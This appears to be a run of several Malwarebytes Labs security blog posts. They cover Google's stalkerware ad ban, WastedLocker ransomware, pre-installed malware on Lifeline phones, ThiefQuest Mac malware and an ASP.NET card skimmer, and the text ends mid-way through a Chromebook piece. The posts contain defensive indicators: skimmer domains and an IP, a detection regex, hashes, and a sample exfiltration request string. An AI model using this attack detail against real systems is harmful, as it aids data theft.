IT News

On Friday, July 10, Google announced it would no longer allow advertising for spyware and similar surveillance technology—often referred to as “stalkerware”—on its platform.

The change is a welcome step by one of the largest, most powerful companies in online advertising, but a close read of the policy reveals a potential loophole that could allow stalkerware-type app makers to still advertise their products on Google. Simply put, these companies could skirt the rules by changing the face of what they’re selling, without changing the core technology within.

We hope this exception will soon be addressed.

For over a year, Malwarebytes has charged ahead on a renewed commitment to protecting users and domestic abuse survivors from the threats posed by stalkerware. These apps can give individuals the opportunity to pry into text messages, emails, and call logs, rifle through web browsing and GPS location history, and reveal sensitive photos, videos, and social media activity, all without consent.

In our advocacy to protect users from these threats, we have spoken directly to domestic abuse survivors. We have provided device security trainings to local domestic abuse support organizations and family justice centers. We have met with devoted law enforcement officials. We helped launch the Coalition Against Stalkerware as a founding partner. We have contributed to research studies and we have increased our own detections for our two, internal categories of applications that provide capabilities to spy on user activity without consent: “monitor” apps and “spyware” apps.  

Through our continued work, we’ve learned that one of the ways that stalkerware-type apps avoid scrutiny is through potentially deceptive marketing campaigns that brand themselves as safe tools for parental monitoring. It is unfortunate that these same tactics could prove effective for bypassing Google’s new policy.

The change, the exception, and the problem

According to Google, the company’s updated advertising policy will “prohibit the promotion of products or services that are marketed or targeted with the express purpose of tracking or monitoring another person or their activities without their authorization.” The updated policy will take effect August 11, 2020.

In responding to a question as to why Google decided to now announce this updated, a spokesperson said: “We constantly evaluate and update our ad policies to ensure we are protecting users. We routinely update our language with examples to help clarify what we consider policy violating. Spyware technology for partner surveillance was always in scope of our policies against dishonest behavior.”

The updated policy applies to “spyware and technology used for intimate partner surveillance including but not limited to spyware/malware that can be used to monitor texts, phone calls, or browsing history; GPS trackers specifically marketed to spy or track someone without their consent;” and “promotion of surveillance equipment (cameras, audio recorders, dash cams, nanny cams) marketed with the express purpose of spying.”

The non-exhaustive list captures some of the current types of invasive tools available today. But further down in its policy update, Google explained that there are exceptions to the new rule. The policy will not apply to “private investigation services” or “products or services designed for parents to track or monitor their underage children.”

The problem, as we reported nearly one year ago on Malwarebytes Labs, is that the line between stalkerware-type applications and parental monitoring applications can be blurred.

As we wrote before:

“Emory Roane, policy counsel at Privacy Rights Clearinghouse, said that, not only are the technical capabilities of stalkerware apps and parental monitoring apps highly similar, the capabilities themselves can be found within the type of hacking tools used by nation states.

‘If you look at the capabilities: What results can be gathered from devices implanted with stalkerware versus devices hacked by nation states? It’s the same,’ Roane said. ‘Turning on and off the device remotely, key loggers, tracking via GPS, all of this stuff.’”

What’s more is that sometimes, apps that previously marketed themselves as tools for potentially spying on romantic partners and spouses can then quickly turn around and masquerade as parental monitoring apps.

Erica Olsen, director of the Safety Net project for the National Network to End Domestic Violence, said she personally saw these “rebranding” tactics herself when then-Senator Al Franken introduced legislation to prohibit the use of apps which could reveal a person’s GPS location without their knowledge or consent.

“After the public legislative hearings Al Franken held on location-based apps and stalking products, a ton of them changed their marketing almost overnight,” said Olsen, who also shared that Google’s updated policy is a move in the right direction. “We held up large, blown-up images of their problematic marketing and they removed it. But they didn’t change the basic functionality of the apps that allowed them to be used for these behaviors. That spoke volumes.”

Last year, Twitter allowed sponsored tweets that advertised an app that can track call logs, text messages, GPS location, web browsing history, and social media activity, and reveal sensitive photos and videos. The advertisement portrayed a man lying down in bed, checking his phone. Written across the advertisement were the words: “What is she hiding from you?”

Twitter took the advertisement down after users grew incensed. According to VICE, Twitter explained its takedown by saying: “The app violates our Malware and Software Download Policy and will no longer be allowed to advertise on the platform.”

This was a swift move by Twitter, but today, that same app markets itself on its own website as a tool for parental monitoring.

On Friday, computer security writer Graham Cluley raised the same issues we are raising here—that some stalkerware-type apps may still be able to advertise on Google, simply by changing their advertising strategy.

“Sadly, I doubt Google’s ad ban will stop stalkerware apps from promoting themselves,” Cluley wrote, “it’s just they may no longer be able to be quite so explicit in their online adverts about how they are most likely to be used.”

Next steps against stalkerware

As a founding partner in the Coalition Against Stalkerware, Malwarebytes understands that the threats of stalkerware are multifaceted, and responding to these threats requires cross-disciplinary support. That includes the commitment of online advertiser platforms to remove spaces for companies that deliberately advertise the potential of privacy as a product feature.

Despite the carve-outs to Google’s updated advertising policy, the company’s overall intention here is good.

Our commitment to protecting users from these the threats of stalkerware-type apps continues. We welcome others to join.

The post Stalkerware advertising ban by Google a welcome, if incomplete, step appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs, we took an in-depth look at card skimmers targeting ASP sites, we released another episode of Lock and Code exploring the Internet of Things, and we dug into a Mac mystery. We also examined some pre-installed malware, and put out a threat spotlight on some customized ransomware.

Other cybersecurity news

• Social media went head to head with lawmakers: User data was up for debate as the giants in the space grappled with Hong Kong’s new national security law (Source: The Register)
• Magecart lurked on hundreds of sites: a major headache for both shopping portals and consumers (Source: Gemini Advisory)
• Cyber attackers upped their game: Explosion at nuclear plant blamed on hackers (Source: Computing)
• Maxing the macros: Ransomware attacks highlighted that Macros haven’t gone away as a route into systems (Source: Bleeping Computer)
• Stay healthy: Bots are increasingly targeting the healthcare sector (Source: Imperva)
• Disinformation clampdown: Facebook came out swinging against dubious information posted to the site (Source: BBC)
• Zoom and doom: Fake Zoom notifications were spotted going phishing (SC Magazine)
• No joke: Android malware proved troublesome for the Google Play store (Source: Forbes)
• School’s in: Now’s the time to steer clear of potential “back to school” scams (Source: Tessian)
• Covid-19 phishing: Law enforcement warned the public to be wary of refund shenanigans (Source: Times of India)

Stay safe, everyone!

The post A week in security (July 6 – 12) appeared first on Malwarebytes Labs.

WastedLocker is a new ransomware operated by a malware exploitation gang commonly known as the Evil Corp gang. The same gang that is associated with Dridex and BitPaymer.

The attribution is not based on the malware variants as WastedLocker is very different from BitPaymer. What was kept was the ability to add specific modules for different targets.

The attacks performed using WastedLocker are highly targeted at very specific organizations. It is suspected that during a first penetration attempt an assessment of active defenses is made and the next attempt will be specifically designed to circumvent the active security software and other perimeter protection.

The ransomware name is derived from the filename it creates which includes an abbreviation of the victim’s name and the string “wasted”.

For each encrypted file, the attackers create a separate file that contains the ransomware note. The ransom note has the same name as the associated file with the addition of “_info”.

The ransom demands are steep, ranging from $500,000 to over $10 million in Bitcoin. Given that the operators make every effort to go after any backups, some organizations may feel the need to pay up. Where other ransomware operators are adding the exfiltration and even auction of stolen data to their arsenal, the Evil Corp gang has shown no inclination in that direction yet.

Historically the Evil Corp gang targets mostly US organizations and it looks like they are staying on that track with a few victims in Europe. The main players in the group are believed to be Russian.

The importance of offline backups

In general, we can state that if this gang has found an entrance into your network it will be impossible to stop them from encrypting at least part of your files. The only thing that can help you salvage your files in such a case is if you have either roll-back technology or a form of off-line backups. With online, or otherwise connected backups you run the chance of your backup files being encrypted as well, which makes the whole point of having them moot. Please note that the roll-back technologies are reliant on the activity of the processes monitoring your systems. And the danger exists that these processes will be on the target list of the ransomware gang. Meaning that these processes will be shut down once they gain access to your network.

As you may have noticed this is a very sophisticated and highly targeted type of ransomware. Which means that, given the ransom demands, most of the affected companies will have a dedicated cyber- security department. It is imperative that this staff is alert on the early warning signs of these attacks which may be indicated by breach attempts. At later stages more disruptive actions may be taken, such as disabled security software, dropped files, and deleted backups

Unlike other ransomware operators Evil Corp does not exfiltrate stolen data and publish or auction the data that belong to “clients” that are unwilling to pay the ransom.

Infection details

One of the methods found to date is the usage of fake software update alerts embedded in existing websites.

The malware from these websites is a penetration testing and exploration kit designed to create a foothold and gather information about the network. Historically Evil Corp has targeted file servers, database services, virtual machines, and cloud environments.

Once the exploration phase has completed the gang will drop the ransomware on the compromised systems.

The ransomware itself is custom built for each client so there is nothing to be gained by doing a full analysis. The attacks do have some commonalities though which we will discuss here.

• Deletes shadow copies, which are the default backups made by the Windows OS.
• The main executable for the ransomware is copied to the system folder and gets elevated permissions
• A service is created that runs during encryption.
• During encryption the encrypted files are renamed, and the ransom notes are created.
• A log file is created that lists the number of targeted files, the number of encrypted files, and the number of files that were not encrypted due to access rights issues.
• The service is stopped and deleted.

Overview

• WastedLocker has been actively deployed since May 2020.
• Evil Corp behind: this group previously associated to the Dridex malware and BitPaymer aka IEcrypt aka FriedEx aka WastedLocker.
• Evil Corp has been using WastedLocker to request ransoms in the range of millions of USD, with some demands going above $10 million.
• WastedLocker replaces BitPaymer in the group’s operations.
• Technically, WastedLocker does not have much in common with BitPaymer
• The ransomware name is derived from the filename it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. 
• Encrypted files extension is set according to the targeted organisations name along with the prefix wasted
• Example: test.txt.orgnamewasted (encrypted data) and test.txt.orgnamewasted_info (ransomware note)
• No data theft and no leak site.
• Each ransomware victim has a custom build configured or compiled for them.
• Note contains: Protonmail and Tutanota email domains, as well as Eclipso and Airmail email addresses. The email addresses listed in the ransom messages are numeric – usually 5 digit numbers.

Infection highlights

• Delete shadow copies
• Copy the ransomware binary file to %windir%system32 and take ownership of it (takeown.exe /F filepath) and reset the ACL permissions. In other cases an Alternate Data Stream (ADS) is used as a means to run the ransomware processes.
• Create and run a service. The service is deleted once the encryption process is completed.

IOC’s

*wasted and *wasted_info filenames for encrypted files and the ransom notes

Basic layout of the content of the ransom note:

*ORGANIZATION_NAME*
YOUR NETWORK IS ENCRYPTED NOW
USE *EMAIL1* | *EMAIL2* TO GET THE PRICE FOR YOUR DATA
DO NOT GIVE THIS EMAIL TO 3RD PARTIES
DO NOT RENAME OR MOVE THE FILE
THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:
[begin_key]*[end_key]
KEEP IT

The email addresses are usually numeric and 5 digits, one at Protonmail and the other at Airmail, but we have also seen Tutanota and Eclipso email addresses.

Malwarebytes detection

Malwarebytes detects WastedLocker ransomware as Ransom.BinADS.

Stay safe everyone!

The post Threat spotlight: WastedLocker, customized ransomware appeared first on Malwarebytes Labs.

We have discovered, yet again, another phone model with pre-installed malware provided from the Lifeline Assistance program via Assurance Wireless by Virgin Mobile.  This time, an ANS (American Network Solutions) UL40 running Android OS 7.1.1.  

After our writing back in January—”United States government-funded phones come pre-installed with unremovable malware“—we heard an outcry from Malwarebytes patrons.  Some claimed that various ANS phone models were experiencing similar issues to the UMX (Unimax) U683CL.  However, it’s very hard to verify such cases without physically having the mobile device in hand. For this reason, I could not confidently write about such cases publicly. Thankfully, we had one Malwarebytes patron committed to proving his case. Thank you to Malwarebytes patron Rameez H. Anwar for sending us your ANS UL40 for further research! Your cyber-security expertise and persistence into this case will surely aid others!

Clarification of availability

To clarify, it is unclear if the phone in question, the ANS UL40, is currently available by Assurance Wireless. However, the ANS UL40 User Manual is listed (at the time of this writing) on the Assurance Wireless website.

Therefore, we can only assume it is still available to Assurance Wireless customers. Regardless, the ANS UL40 was sold at some point and some customers could still be affected.

Infection types

Just like the UMX U683CL, the ANS UL40 comes infected with a compromised Settings app and Wireless Update app. Although this may be true, they are not infected with the same malware variants. The infections are similar but have their own unique infection characteristics. Here’s a rundown of the infected apps.

Settings

• Package Name: com.android.settings
• MD5: 7ADA4AAEA49383499B405E4CE0A9447F
• App Name: Settings
• Detection: Android/Trojan.Downloader.Wotby.SEK

The Settings app is exactly what it sounds like—it is the required system app used to control all the mobile device’s settings. Thus, removing it would leave the device unusable. For the case of the ANS UL40, it is infected with Android/Trojan.Downloader.Wotby.SEK.

Proof of infection is based on several similarities to other variants of Downloader Wotby. Although the infected Settings app is heavily obfuscated, we were able to find identical malicious code. Additionally, it shares the same receiver name: com.sek.y.ac; service name: com.sek.y.as; and activity names: com.sek.y.st, com.sek.y.st2, and com.sek.y.st3. Some variants also share a text file found in its assets directory named wiz.txt. It appears to be a list of “top apps” to download from a third-party app store.  Here’s snippet of code from the text file.

To be fair, no malicious activity triggered for us from this infected Settings app. We were expecting to see some kind of notification or browser popup populated with info from the code above displayed. Unfortunately, that never happened. But we also didn’t spend the normal amount of time a typical user would on the mobile device. Nor was a SIM card installed into the device, which could impact how the malware behaves. Nevertheless, there is enough evidence that this Settings app has the ability to download apps from a third-party app store. This is not okay. For this reason, the detection stands.

Although unsettling, it’s important to note that the apps from the third-party app store appear to be malware-free. This was verified by manually downloading a couple for ourselves for analysis. That’s not to say that malicious versions couldn’t be uploaded at a later date. Nor did we verify every sample. Nevertheless, we believe the sample set we did verify holds true for other apps on the site. Under those circumstances, even if the ANS’s Settings app had downloaded an app from the list, it’s still not as nefarious as the Settings app seen on the UMX U683CL.

WirelessUpdate

• Package Name: com.fota.wirelessupdate
• MD5: 282C8C0F0D089E3CD522B4315C48E201
• App Name: WirelessUpdate
• Detections: Three variants of Android/PUP.Riskware.Autoins.Fota
  • Variants .INS, .fscbv, and .fbcv

WirelessUpdate is categized as a Potentially Unwanted Program (PUP) riskware auto-installer that has the ability to auto-install apps without user consent or knowledge. It also functions as the mobile device’s main source of updating security patches, OS updates, etc.

Android/PUP.Riskware.Autoins.Fota in particular is known for installing various variants of Android/Trojan.HiddenAds—and indeed it did! In fact, it auto installed four different variants of HiddenAds as seen below!

• Package Name: com.covering.troops.merican
• MD5: 66C7451E7C87AD5145596012C6E9F9A0
• App Name: Merica
• Detection: Android/Trojan.HiddenAds.MERI

• Package Name: com.sstfsk.cleanmaster
• MD5: 286AB10A7F1DDE7E3A30238D1D61AFF4
• App Name: Clean Master
• Detection: Android/Trojan.HiddenAds.BER

• Package Name: com.sffwsa.fdsufds
• MD5: 4B4E307B32D7BB2FF89812D4264E5214
• App Name: Beauty
• Detection: Android/Trojan.HiddenAds.SFFW

• Package Name: com.slacken.work.mischie
• MD5: 0FF11FCB09415F0C542C459182CCA9C6
• App Name: Mischi
• Detection: Android/Trojan.HiddenAds.MIS

Payload drop verification

Now you might be wondering, “How did you verify which of the two pre-installed infected system apps is dropping the payloads?” The process works as follows. You disable one of them upon initially setting up the mobile device. In both the UMX and ANS cases, picking which one to disable was easy to decide. That’s because disabling the Settings app renders the phone unusable. So, disabling WirelessUpdate was the obvious choice in both cases. The next step in the process is waiting a couple of weeks to see if anything happens. And yes, you sometimes need to wait this long for the malware to drop payloads. If nothing happens after a couple of weeks, then it’s time to re-enable the infected system app again and start the waiting game all over.

Using this process, we found in the case of the UMX U683CL, the Settings app was the culprit. For the ANS UL40, after not seeing any dropped payload(s) for weeks, I re-enabled WirelessUpdate. Within 24 hours, it installed the four HiddenAds variants! Caught red-handed, WirelessUpdate!

The tie between UMX and ANS

With our findings, we imagine some are left wondering: Is this a correlation or coincidence? We know that both the UMX and ANS mobile devices have the same infected system apps. However, the malware variants on the U683CL model and the UL40 are different. As a result, I initially didn’t think there was any ties between the two brands. I summed it up to be a coincidence rather than a correlation. That is until I stumbled upon evidence suggesting otherwise. 

The Settings app found on the ANS UL40 is signed with a digital certificate with the common name of teleepoch. Searching teleepoch comes up with the company TeleEpoch Ltd along with a link to their website. Right there on the homepage of TeleEpoch Ltd it states, Teleepoch registered brand “UMX” in the United States. 

Let’s review. We have a Settings app found on an ANS UL40 with a digital certificate signed by a company that is a registered brand of UMX.  For the scoreboard, that’s two different Settings apps with two different malware variants on two different phone manufactures & models that appear to all tie back to TeleEpoch Ltd. Additionally, thus far the only two brands found to have preinstalled malware in the Settings app via the Lifeline Assistance program are ANS and UMX.

This led me to do further research into the correlation by looking at cases in our support system of other ANS models that might have preinstalled malware. That’s when I found the ANS L51. For the record, the L51 was another model being boasted as having preinstalled malware within the comments of the UMX article in January. I discovered that the ANS L51 had the same exact malware variants as the UMX U683CL! There, within previous support tickets, was hard proof of the ANS L51 infected with Android/Trojan.Dropper.Agent.UMX and Android/PUP.Riskware.Autoins.Fota.fbcvd. Driving home the triage of TeleEpoch, UMX, and ANS correlation! 

Solutions

We have the utmost faith that ANS will quickly find a resolution to this issue. Just as UMX did as stated in the UPDATE: February 11, 2020 section of the January writing. As a silver lining, we did not find the Settings app on the ANS to be nearly as vicious as on the UMX.  Thus, the urgency is not as severe this time around.

In the meantime, frustrated users with the ANS UL40 can halt the reinfection of HiddenAds by using this method to uninstall WirelessUpdate for current user (details in link below):

Removal instructions for Adups

Warning: Make sure to read Restoring apps onto the device (without factory reset) in the rare case you need to revert/restore app.  For instance, if you like to restore WirelessUpdate to check if there are important system updates.

Use this/these command(s) during step 7 under Uninstalling Adups via ADB command line to remove:

adb shell pm uninstall -k –user 0 com.fota.wirelessupdate

Budget should not equate to malware

There are tradeoffs when choosing a budget mobile device. Some expected tradeoffs are performance, battery life, storage size, screen quality, and list of other things in order to make a mobile device light on the wallet. 

However, budget should never mean compromising one’s safety with pre-installed malware. Period.

The post We found yet another phone with pre-installed malware via the Lifeline Assistance program appeared first on Malwarebytes Labs.

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to JP Taggart, senior security researcher at Malwarebytes, about the Internet of Things.

For years, Internet capabilities have crept into modern consumer products, providing sometimes convenient, sometimes extraneous Internet connectivity. This increase in IoT devices has an obvious outcome—a broader attack surface for threat actors. Not only that, but with more devices connecting to the Internet, there are also more devices collecting your data and analyzing it to send you more ads, more frequently, for more products.

Tune in to hear about the development of IoT devices, their cybersecurity and data privacy lapses, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

• Of Bluetooth and beacons: We took a look at how companies use Bluetooth to track you and use that capability for their benefit.
• A malicious installer of the Little Snitch app was brought to our attention, and it happens to be a new Mac ransomware we now call ThiefQuest.
• The Chromebook, they say, is a system that doesn’t need antivirus protection. Or does it? We took a deep dive into this claim to see if it truly holds water.

Plus other cybersecurity news:

• Another ransomware attack struck a school, this time the University of California, who admitted to paying the ransom to the tune of 1.4 USD. (Source: Computer Business Review)
• A known APT threat actor called Promethium, aka StrongPity, was spotted by multiple security researchers pushing Trojanized installers that mimic legitimate programs to target countries, which include India and Canada, for intelligence gathering. (Source: ZDNet)
• Website owner and bloggers, beware! There’s a “secure DNS” scam making rounds, purporting to “help” you. (Source: Sophos’s Naked Security Blog)
• Attackers compromised several US newspaper websites, and then used them as launchpads to distribute code that allows for the downloading of ransomware to visitors, of which are mostly huge organizations. (Source: Dark Reading)
• TrickBot, a nefarious and very tricky Trojan, has a new quirk: it checks for the screen resolution spec of victim machine to identify if it is running on a virtual machine or not. (Source: BleepingComputer)

Stay safe, everyone!

The post Lock and Code S1Ep10: Pulling apart the Internet of Things with JP Taggart appeared first on Malwarebytes Labs.

Editor’s note: The original name for the malware, EvilQuest, has been changed due to a legitimate game of the same name from 2012. The new name, ThiefQuest, is also more fitting for our updated understanding of the malware.

The ThiefQuest malware, which was discovered last week, may not actually be ransomware according to new findings. The behaviors that have been documented thus far are still all accurate, but we no longer believe that the ransom is the actual goal of this malware.

Why? That’s a great question, and there have been a number of bread crumbs that have led us to this conclusion.

Unlikely ransom behavior

The presence of keylogging and backdoor code, discovered by Patrick Wardle, is unusual in ransomware. Unheard of on the Mac, really, but then we haven’t seen much ransomware on this side of the street. This discovery indicated that there was something strange about this threat.

There are also several clues left right in the ransom note itself:

The first clue is that the price of decryption is $50 USD. That’s a strangely low price, and in USD rather than Bitcoin, and the victim would be expected to calculate the correct amount of Bitcoin at the exchange rate at that moment. This by itself, however, isn’t proof of anything.

There was another finding later noticed by Lawrence Abrams, of Bleeping Computer, who has more experience with ransomware in the Windows world than most of the Mac researchers who were investigating. There was no email address provided in the ransom note, so there’s no way to get in touch with the criminals behind the malware to get your decryption key—and no way for them to contact you either.

Further, when ransom notes obtained from different systems were compared, it was discovered that the Bitcoin address given is the same for everyone. This means that there would be no way for the criminals to verify who paid the ransom.

Finally, although there is a decryption routine in the malware, findings by Patrick Wardle showed that it was not called anywhere in the malware code, meaning the function is orphaned and will never get executed.

This, plus the strange reluctance shown by the malware to actually encrypt anything, suggests that the ransom is merely a distraction. (I was only able to get files encrypted once, and that was not the same install where the malware was yelling at me every five minutes that it had encrypted my files when it actually hadn’t.)

While looking at the network activity from an active install of ThiefQuest, I noticed that it was making literally hundreds of connections to the command and control (C2) server rapidly.

Like a magician, distracting your eye with one hand while the other performs some slight of hand, this malware appears to be making a lot of noise to cover for what we now believe is its real goal: data exfiltration.

Exfiltration?

For those unfamiliar with the term, data exfiltration is simply data theft. It’s used to refer to the act of malware collecting data from an infected machine and sending it to a server under the attacker’s control.

In the case of ThiefQuest, there was a Python script that was dropped on the system, but not reliably. (I didn’t get it in every installation.) That script was used to exfiltrate data.

This script scans through all the files in the /Users/ folder—the folder that contains all user data for all users on the computer—for any files having certain extensions, such as .pdf, .doc, .jpg, etc. Some extensions in particular indicate points of interest for the malware, such as .pem, used for encryption keys, and .wallet, used for cryptocurrency wallets.

Those files are then uploaded via unencrypted HTTP, one after another. Examining the network packets showed that they contained a string with two pieces of information: a file path and a random string of characters.

c=VGhpcyBpcyBhIHRlc3QK&f=%2FUsers%2Ftest%2FDocuments%2Fpasswords.doc

The passwords.doc file this refers to was a decoy file that contained the text “This is a test.” The seemingly random string, VGhpcyBpcyBhIHRlc3QK, is a base64-encoded string that, when decoded, shows the content of the file.

Thus, the malware was exfiltrating hundreds of files over unencrypted HTTP.

So what is this Mac malware?

According to Abrams, such malware in the Windows world is known as a “wiper.” Such malware is often intended to steal data and wipe the system, in part or in whole, to cover its tracks.

Typically, a wiper is deployed in targeted attacks against a particular organization. Sometimes, as has been the case with malware such as the infamous NotPetya, that malware will spread beyond the target, or may intentionally be spread widely to hide who the target is.

At this point, there’s no indication that this is a targeted attack. It’s too all over the board so far, with random sightings all over the globe.

There is some indication that this may be just a proof-of-concept (PoC), such as the following comment in a Python script associated with the malware:

# n__ature checking PoC
# TODO: PoCs are great but this thing will
# deliver much better when implemented in
# production

I am always reluctant to believe what a piece of malware tells me. This may be a red herring, or may be an old comment that was never removed, or perhaps that single Python script itself is the PoC. Still, the apparent lack of polish on this malware could mean that it was not really ready for release.

Additional capabilities

As mentioned previously, this malware appears to also include code for keylogging and for opening a backdoor to give the attacker prolonged access to your Mac. This is unusual for ransomware, but not really at all unusual for our new understanding of the malware.

More unexpected, though, is the fact that the malware appears to include code that behaves like the textbook definition of a virus—something that has not been seen on Macs since the change from System 9 to Mac OS X 10.0.

We previously noted that the malware injected itself into some files related to Google Software Update, and found this rather puzzling, as Google Chrome will detect the changes and replace the tampered files with clean ones. However, new findings on viral behavior from Patrick Wardle revealed more information about how this is happening.

A virus is a specific type of malware that adds malicious code to legitimate apps or executables, as a way to spread or reinfect a machine.

The malware will actually search through the /Users/ folder looking for executable files. When it finds one, it will prepend malicious code to the beginning of the file. This means that when the file is executed, the malicious code is executed first. That code will then copy the legit file content into a new, invisible file and execute that.

The act of replacing or modifying a legit file with a malicious one, and then running legit code to make it look like nothing’s wrong, is not new on macOS. In fact, the first real Mac ransomware, KeRanger, was spread through a modified copy of the Transmission torrent app. The attacker modified Transmission then hacked the Transmission web site to spread the poisoned version of the app.

However, until now, this had been done manually by an attacker in order to modify a legitimate app for malicious distribution. This has not been done in an automated fashion by malware since the days of System 1 through System 9, when Mac viruses were last seen.

What should I do if I’m infected?

The intent of the malware doesn’t change its removal, and Malwarebytes for Mac will still remove all known components of the malware.

However, there are some other considerations. It’s entirely possible that executable files on an infected Mac may have been modified maliciously, and these changes may not be detected by antivirus software. Even if they are, removal of those files may cause damage to software on your system. Thus, because of this danger and the likely damage to user data, it may be prudent to restore an infected system from backups rather than trying to disinfect it.

Recovering from data theft can be harder, in some ways, than recovering from ransomware. If you have good backups, recovering from ransomware is relatively easy. There’s no taking back stolen data, though!

If you were infected, spend some time thinking about what data you have that may have been stolen. How you respond depends on the data. If you had credit cards in the data in your user folder, you may want to consider canceling them. If there was sensitive personal information, such as social security numbers, consider locking your credit with credit agencies. If you had passwords, change those passwords wherever you use them.

Ultimately, though, personal information that has been stolen is forever in other hands. In cases of embarrassing or damaging information that is leaked, there’s no recovery. If the attacker decides to do something malicious with that—blackmail, for example—you can’t protect yourself.

Thus, it’s best not to rely on the FileVault encryption on your hard drive. That’s great for protecting your data if your Mac gets stolen, but not so much against malware running on the machine. If you have any highly sensitive data, be sure that it is encrypted independently somehow. Prevention is always the best protection.

I don’t have backups! Can I get my data back?

A decryptor for files that may have gotten encrypted is available on GitHub. It is a command-line tool, so if you’ve had files encrypted, you’ll need to run the decryptor from the Terminal. If you aren’t sure what to do, please feel free to seek help in the Malwarebytes forums.

The post Mac ThiefQuest malware may not be ransomware after all appeared first on Malwarebytes Labs.

Cybercriminals typically focus on targets that can get them the highest return with the least amount of effort. This is often determined by their ability to scale attacks, and therefore on how prevalent a vulnerability or target system is. Enter: the credit card skimmer.

In the world of digital skimming, we’ve seen the most activity on e-commerce content management systems (CMSes), such as Magento and plugins like WooCommerce.

However, it is important to remember that attackers can and will go after any victim when the opportunity is there. Case in point: The skimmer we describe today has been active in the wild since mid-April, and is targeting websites hosted on Microsoft IIS servers running the ASP.NET web application framework.

Unusual victims

As defenders, we tend to focus a lot of our attention on the same platforms, in large part because most of the compromised websites we flag are built on the LAMP (Linux, Apache, MySQL, and PHP) stack. It’s not because those technologies are less secure, but simply because they are so widely adopted.

And yet, in this campaign, the credit card skimmer is exclusively focused on websites hosted on Microsoft IIS servers and running ASP.NET, Microsoft’s web framework to develop web apps and services.

We found over a dozen websites that range from sports organizations, health, and community associations to (oddly enough) a credit union. They have been compromised with malicious code injected into one of their existing JavaScript libraries.

There doesn’t seem to be a specific JS library being targeted, and the code, which we will review later, sometimes takes different forms. However, all the sites we identified were running ASP.NET version 4.0.30319, which is no longer officially supported and contains multiple vulnerabilities.

While ASP.NET is not as popular as PHP, especially for smaller businesses and personal blogs, it still accounts for a sizable market share and, as one might expect, includes websites running shopping cart applications. All the compromised sites we identified had a shopping portal, and this is exactly what the attackers were after.

Different types of malicious injection

In a few instances, the skimmer was loaded remotely. For example, Figure 4 shows a legitimate library where malicious code was appended and obfuscated. It loaded the skimmer from the remote domain thxrq[.]com. The actual file may be named element_main.js, gmt.js, or some other variation.

However, in most cases, we saw the full skimming code being injected directly into the compromised JavaScript library of the affected site. There were several different styles that made identification a little challenging.

Skimmer triggers on credit card number or password

This skimmer (source code here) is designed to not only look for credit card numbers but also passwords, although the latter appears to be incorrectly implemented. We can see those checks with two different calls for the match method.

The data is encoded using an interesting logic.

• charcodeAt() method to return the Unicode of each character contained within the string of each specific field
• toString() method to convert that number to a string

There’s an additional twist in that it groups the resulting combined strings by sets of two characters.

Finally, the data is exfiltrated via the same domain in a GET request where the filename is a GIF image. When this skimmer is loaded by default, it will also issue a GET request for the file null.gif (no exfiltration data present).

In order to decode data sent in an exfiltration attempt, we need to reverse this logic.

• Take the blurb and create an array of elements with two strings each
• Use the parseInt() function to transform the two-character string into an integer
• Use the String fromCharCode() method to convert the Unicode number into a character

Here’s how we can take the URL path with encoded data (input) and run it through a piece of JavaScript to see the decoded version of it:

Campaign likely started mid April

This skimming campaign likely began sometime in April 2020 as the first domain (hivnd[.]net) part of its infrastructure (31.220.60[.]108) was registered on April 10 by a threat actor using a ProtonMail email address.

OSINT data from sources such as urlscan.io shows various sites and brands were affected during this time period. Some of those sites already remediated the compromise.

We started contacting the remaining affected parties in the hope that they would identify the breach and take appropriate actions to harden their infrastructure.

All platforms and frameworks welcome

Credit card skimming has become a popular activity for cybercriminals over the past few years, and the increase in online shopping during the pandemic means additional business for them, too.

Attackers do not need to limit themselves to the most popular e-commerce platforms. In fact, any website or technology is fair game, as long as it can be subverted without too much effort. In some cases, we notice “accidental” compromises, where some sites get hacked and injected even though they weren’t really the intended victims.

Malwarebytes customers are protected against this and other credit card skimming campaigns via web protection technology available in our desktop software and through our Browser Guard extension.

Thanks to @unmaskparasites for sharing additional insight on the affected websites.

Indicators of Compromise

Regex to find ASP.NET skimmer injections

(jqueryw+||undefined;jqueryw+={1,5}undefined&&)|(!window.jqvw+&&(jqvw+=function(a){return)

Skimmer infrastructure

idpcdn-cloud[.]com
joblly[.]com
hixrq[.]net
cdn-xhr[.]com
rackxhr[.]com
thxrq[.]com
hivnd[.]net

31.220.60[.]108

The post Credit card skimmer targets ASP.NET sites appeared first on Malwarebytes Labs.

The supervisor handed Jim a Chromebook and said: “Take this home with you and use it to send me updates. We want to minimize the number of visits to the office—anything you can do from home helps keep this place safer. When the pandemic is over, I’d like to have it back in one piece, if possible.”

Jim is great at his job, but his reputation with technology skills is somewhat lacking. This should be an interesting experiment.

The Chromebook Jim’s supervisor hands him is a low-level laptop running ChromeOS. Because of the minimum hardware requirements for ChromeOS, these laptops are usually a lot cheaper than those running Windows or macOS. Bonus: Chromebooks are user-friendly, so folks with less technical savvy can still navigate with ease.

Not all jobs allow for working from home (WFH)—some have to visit clients or building sites. But for those who can, a Chromebook can be an ideal solution for employers to hand out. They are cheap, fast, and as long as you don’t need any complex or specific software to run on them, they can be used for any web-based and administrative tasks, such as reading and sending email, creating progress reports, and preparing information for the billing department.

Chromebook security

Chromebooks are supposed to come with sufficient, built-in security. But is that really true? Can you use a Chromebook without having to think twice about general cybersecurity and anti-malware protection in particular? Or do you need Chromebook antivirus? Let’s have a look first at which security features are pre-packed in ChromeOS.

The built-in security features of ChromeOS include:

• Automatic updating: This is a good feature. No argument there. But it says nothing about the frequency of updates or about how fast updates will become available to counter zero-day vulnerabilities.
• Sandboxing: Sandboxing is a method to limit the impact of an infection. The idea is that when you close an app or website, the related infection will be gone. While this might be true in most cases, it’s wishful thinking to believe malware authors would be unable to “escape” the sandbox.
• Verified boot: This is a check done when the system starts up to verify that it hasn’t been tampered with. But this check does not work when the system is set to Developer Mode.
• Encryption: This is an excellent feature that prevents criminals from retrieving data from a compromised, stolen or lost laptop, but it does not protect the system against malware.
• Recovery: Recovery is an option that you can use to restore the Chromebook to a previous state. While this could get rid of malware, it might also delete important data in the process.

While Chromebooks have several built-in security features, none of them are full-proof. The danger is minimized by design, but any motivated cybercriminal could find their way around the checks put in place.

Additional Chromebook security risks

